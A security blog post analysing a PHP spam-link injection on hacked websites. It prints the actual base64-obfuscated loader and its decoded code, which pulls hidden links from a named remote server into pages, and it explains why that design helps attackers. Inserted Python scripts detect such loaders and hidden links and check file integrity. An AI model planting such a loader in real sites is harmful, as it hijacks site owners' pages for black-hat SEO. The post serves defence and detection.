
Spammy Links From Remote Servers

   07 Apr 10   Filed in Website exploits

Hidden spammy links injected into web pages on legitimate websites are a widespread type of hacker attack. These parasites try to suck all the “PageRank juice” out of any website they manage to break into and push their shady web pages high in search results.

There are many ways hackers can inject links. They can insert them as plain HTML (which works on most sites) or as encrypted PHP code (the files must then be processed as PHP). Hackers can even use SQL injection on database-driven sites that don’t properly sanitize user input.

Decoupling code from data

Sometimes hackers decouple code from data and inject only some PHP instructions that load spammy links from a standalone file. This makes the construction more flexible since they can simply change the content of that single file whenever they decide to promote a new set of links – no need to update every infected file on a site.

In this post, I’ll show an even more clever way of decoupling code from data.

This is a line of PHP code that you can find in infected files on some compromised sites:

<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

When decoded, it executes the following code:

$l="http://tourreviews .asia/ links2/link.php";
if (extension_loaded("curl")) {
    // fetch the remote links file with cURL when the extension is available
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $l);
    $r = curl_exec($ch);
    curl_close($ch);
} else {
    // fall back to file() with a URL wrapper (requires allow_url_fopen)
    $r = implode("", file($l));
}
// output the remote content into the page; @ suppresses any errors
print @$r;

This is a very simple script that tries to download a link.php file from tourreviews .asia/ links2/ and output its content as part of the pages served from the infected files.
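Webmasters who want to find loaders like this in their own files can look for the eval(base64_decode("...")) construct and decode the payload to see what it fetches. The scanner below is an added example, not code from the original post; it uses a constructed infected file whose remote host (spam-server.example) is a placeholder, and it reports the decoded payload, any URLs in it and the PHP functions it uses to pull remote content.

```python
import base64
import os
import re

# Constructed sample of an infected PHP file. The payload follows the shape
# shown in the post, but the remote host is a placeholder, not a real site.
SAMPLE_PAYLOAD = (
    '$l="http://spam-server.example/links2/link.php"; if (extension_loaded("curl")){ \r\n'
    '$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); '
    'curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); \r\n'
    'curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}\r\n'
    'else{$r=implode("",file($l));} print @$r;\r\n'
)
SAMPLE_FILE = (
    '<?php\n// legitimate header\ninclude "config.php";\n?>\n'
    '<?php eval(base64_decode("'
    + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    + '")); ?>\n<html><body>Hello</body></html>\n'
)

# eval(base64_decode("...")) with optional whitespace and either quote style;
# whitespace inside the base64 string is allowed because attackers sometimes
# break the string up to defeat naive signatures.
EVAL_B64_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*([\'"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)',
    re.IGNORECASE,
)
URL_RE = re.compile(r'https?://[^\s\'"<>]+')
# PHP functions a remote loader typically uses to fetch content
FETCH_FUNCS = ("curl_init", "curl_exec", "file_get_contents", "fopen", "file", "fsockopen")


def decode_payload(b64: str) -> str:
    """Decode a base64 payload, tolerating inserted whitespace."""
    raw = re.sub(r"\s+", "", b64)
    return base64.b64decode(raw).decode("utf-8", errors="replace")


def scan_php(source: str) -> list:
    """Return one finding per eval(base64_decode()) construct in the source."""
    findings = []
    for m in EVAL_B64_RE.finditer(source):
        line_no = source.count("\n", 0, m.start()) + 1
        decoded = decode_payload(m.group(2))
        funcs = [f for f in FETCH_FUNCS if re.search(r"\b" + re.escape(f) + r"\s*\(", decoded)]
        findings.append({
            "line": line_no,
            "decoded": decoded,
            "remote_urls": URL_RE.findall(decoded),
            "fetch_functions": funcs,
            "prints_remote_content": bool(re.search(r"\b(print|echo)\b", decoded)),
        })
    return findings


def scan_directory(root: str) -> dict:
    """Scan every *.php file under root; returns {relative_path: findings}."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_php(fh.read())
                if found:
                    results[os.path.relpath(path, root)] = found
    return results


if __name__ == "__main__":
    for finding in scan_php(SAMPLE_FILE):
        print(f"line {finding['line']}: fetches {finding['remote_urls']} "
              f"via {finding['fetch_functions']}, prints it: {finding['prints_remote_content']}")
```

Run scan_directory() against a copy of the web root rather than the live site when possible, and treat any hit that fetches a URL and prints the result as the remote-loader pattern described above; legitimate code rarely needs eval() on base64 text at all.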

So what is so clever about this script?

Flexibility

If hackers decide to change anything in the injected HTML code, all they need to do is change the content of the link.php file on their own server and the change will be immediately visible (well, not actually visible since the links are invisible) on hacked pages on all compromised sites. This is very convenient if you want to experiment with different layouts, numbers of links per page, etc.

For example, a few months ago this link.php file contained 50 links inside <u style="display:none;"> … </u> tags that made them invisible. Right now this file contains 195 links enclosed in <font style="position: absolute;overflow: hidden;height: 0;width: 0">…</font> tags that make them invisible. Moreover, every link is a <li> element now.

Hackers also constantly rotate the links. On every load the content of the link.php file slightly changes. This way they probably want to make the spam less suspicious since identical link blocks on multiple sites are more likely to trigger anti-spam filters.
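Both hiding techniques mentioned above (display:none and a zero-size box with overflow:hidden) can be detected from the HTML alone, which is what a page-side check has to do when the links come from a remote file that isn't on the server. The auditor below is an added example written for this post, not the Unmask Parasites code; it walks the document with the standard-library HTML parser, treats an anchor as hidden when it or any ancestor carries a hiding style, and also covers visibility:hidden, which the post does not mention. The sample page is constructed and its spam hosts are placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: two legitimate links plus link blocks hidden with
# the two CSS tricks described in the post and one more (visibility:hidden).
SAMPLE_HTML = """<html><body>
<p>Welcome to our <a href="/about">about page</a>.</p>
<u style="display:none;"><a href="http://spam1.example/">cheap pills</a> <a href="http://spam2.example/">casino</a></u>
<font style="position: absolute;overflow: hidden;height: 0;width: 0">
<ul><li><a href="http://spam3.example/x">loans</a></li><li><a href="http://spam4.example/y">essays</a></li></ul>
</font>
<div style="visibility:hidden"><a href="http://spam5.example/">hidden too</a></div>
<div style="overflow:hidden; height:200px"><a href="/contact">Contact</a></div>
</body></html>"""

DISPLAY_NONE = re.compile(r"display\s*:\s*none", re.I)
VISIBILITY_HIDDEN = re.compile(r"visibility\s*:\s*hidden", re.I)
OVERFLOW_HIDDEN = re.compile(r"overflow\s*:\s*hidden", re.I)
ZERO_SIZE = re.compile(r"\b(height|width)\s*:\s*0(?:px|em|%)?\s*(?:;|$)", re.I)


def style_hides(style) -> bool:
    """True if an inline style makes the element's content invisible."""
    if not style:
        return False
    if DISPLAY_NONE.search(style) or VISIBILITY_HIDDEN.search(style):
        return True
    # overflow:hidden alone is normal; combined with a zero dimension it hides everything
    return bool(OVERFLOW_HIDDEN.search(style) and ZERO_SIZE.search(style))


class HiddenLinkAuditor(HTMLParser):
    # elements that never have a closing tag, so they must not go on the stack
    VOID = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col",
            "embed", "source", "track", "wbr"}

    def __init__(self):
        super().__init__()
        self.stack = []        # (tag, hidden) for each open element
        self.hidden = []       # anchors inside a hidden subtree
        self.visible = []      # all other anchors
        self._anchor = None    # anchor currently collecting text

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        parent_hidden = self.stack[-1][1] if self.stack else False
        hidden = parent_hidden or style_hides(a.get("style"))
        if tag == "a" and a.get("href"):
            self._anchor = {"href": a["href"], "text": "", "hidden": hidden}
            (self.hidden if hidden else self.visible).append(self._anchor)
        if tag not in self.VOID:
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        if tag == "a":
            self._anchor = None
        # pop back to the matching open tag; tolerates unclosed <li>/<p>
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        if self._anchor is not None:
            self._anchor["text"] += data.strip()


def audit_links(html: str) -> dict:
    """Split the page's anchors into hidden and visible ones."""
    parser = HiddenLinkAuditor()
    parser.feed(html)
    parser.close()
    return {"hidden": parser.hidden, "visible": parser.visible}


if __name__ == "__main__":
    report = audit_links(SAMPLE_HTML)
    for link in report["hidden"]:
        print(f"HIDDEN {link['href']} ({link['text']!r})")
    print(f"{len(report['hidden'])} hidden, {len(report['visible'])} visible")
```

Because the rotation described above changes the link set on every load, compare counts and hosts across a few fetches rather than exact URLs; a block of hidden outbound links that keeps changing is itself a strong indicator. Styles applied through external stylesheets or classes are not checked here, so a clean result from this parser is not proof of a clean page.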

Easy maintenance

Once the sites are hacked and the PHP code is injected into legitimate files, there’s no need to break into the compromised websites again every time hackers want to change the set of spammy links. The changes will propagate even to websites where the original security hole is already closed (e.g. changed FTP passwords, updated third-party scripts, etc.).

Running several campaigns is also easy – just change the URL of the links file and you are done.

Small footprint

Since all the spammy links are loaded from a remote location on the fly, the size of the injected PHP code is less than 0.5 KB, so the difference is less obvious than in attacks that directly inject all the links (dozens of kilobytes) into legitimate files.

Out of reach

The remote location of the links file makes the hack harder to detect. Webmasters can’t simply scan their servers for the spammy keywords they find injected in their web pages. And the links file can’t be deleted by a site admin who happens to stumble across a suspicious file.

Drawbacks

However, this approach has its obvious drawbacks too. Once the location of the remote file becomes known:

  1. Search engines can regularly check it and discard (or even penalize) any links found in it. So the whole black-hat SEO campaign may fail.
  2. This remote site can be shut down. And since it’s a single point of failure, hidden spammy links will disappear from all the hacked sites. Again, the black-hat campaign will flop and hackers will need to start from scratch.

To webmasters

I can only guess how hackers break into legitimate websites and inject this particular PHP code into web pages (using stolen FTP credentials or via a hole in some script – hope you can help me answer this question in the comments). Actually, it doesn’t matter. You should be prepared for things like this to happen. What you should really do is minimize the damage of such attacks (hidden spammy links can negatively affect your search engine ranking). So your goal is to detect the intrusion and restore the site as soon as possible.

  1. Integrity – regularly check that no one tampers with your files on the server.
  2. Fresh clean backup – regularly make backups and keep some historical versions so that you can easily find and restore a clean version of your site should you detect a problem.

Both of these points can be covered by a revision control system. Most revision control systems will report any changes in existing files and let you roll back to any historical state of the site. Very convenient. Just don’t forget to commit changes when you make them.
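For sites where a revision control system is not practical, the integrity check can be done with a hash manifest: record a hash of every file once, store the manifest somewhere the web server cannot write, and diff a fresh manifest against it on a schedule. The script below is an added example, not code from the original post or from any of the tools named in the comments; it builds a SHA-256 manifest of a constructed site tree in a temporary directory, then shows what the comparison reports after a loader line is appended to one file and a new file is dropped in.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path, chunk_size=65536) -> str:
    """SHA-256 of a file, read in chunks so large uploads don't need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(root) -> dict:
    """Map every regular file under root (relative POSIX path) to its hash."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        # skip symlinks so a link pointing outside the web root can't be used
        # to make the manifest walk somewhere else
        if path.is_file() and not path.is_symlink():
            manifest[path.relative_to(root).as_posix()] = hash_file(path)
    return manifest


def save_manifest(manifest: dict, path) -> None:
    # keep this file outside the web root and unwritable by the web server user
    Path(path).write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(path) -> dict:
    return json.loads(Path(path).read_text())


def compare_manifests(baseline: dict, current: dict) -> dict:
    """Report files that appeared, vanished or changed since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def demo() -> dict:
    """Constructed scenario: baseline a small site, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php include 'inc/header.php'; ?>\n")
        (root / "inc").mkdir()
        (root / "inc" / "header.php").write_text("<h1>Site</h1>\n")
        manifest_path = root.parent / "site-manifest.json"  # outside the web root
        save_manifest(build_manifest(root), manifest_path)

        # simulate the attack: a loader line appended to an existing page and
        # one new file dropped in (payload is the constructed placeholder "Li4u")
        with open(root / "index.php", "a") as fh:
            fh.write('<?php eval(base64_decode("Li4u")); ?>\n')
        (root / "inc" / "x.php").write_text("<?php // dropped file ?>\n")

        result = compare_manifests(load_manifest(manifest_path), build_manifest(root))
        manifest_path.unlink()
        return result


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Any file in "modified" or "added" that you did not deploy yourself deserves a look, and the hidden-link problem in this post shows why "modified" matters most: a 0.5 KB loader appended to an existing page changes its hash even though the file size barely moves.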

While it is not as universal, you can use my Unmask Parasites to check web pages for hidden illicit stuff like spammy invisible links. After all it doesn’t require any setup and you’ll see results instantly.

Have your say

Did you come across similar hacks or maybe even more elaborate black-hat SEO schemes? Let’s unmask them!


Reader's Comments (2)

  1.

    [...] This post was mentioned on Twitter by Denis and Vladimir Nagy, cedricpernet. cedricpernet said: Nice post -> RT @unmaskparasites: [blog] Spammy Links From Remote Servers http://bit.ly/cWrqgm – your comments are welcome [...]

  2.

    Pretty good point on revision control systems. We do that using the FIM (file integrity monitoring) module of the open source OSSEC.

    It basically alerts when a file changes (or is added to a directory).

    The problem is with shared hosts, where they can’t easily monitor if a file is changing or not… For that I would recommend sucuri.net (that does FIM remotely on the pages you specify).

    *I am the founder of sucuri, so my opinion is a bit biased.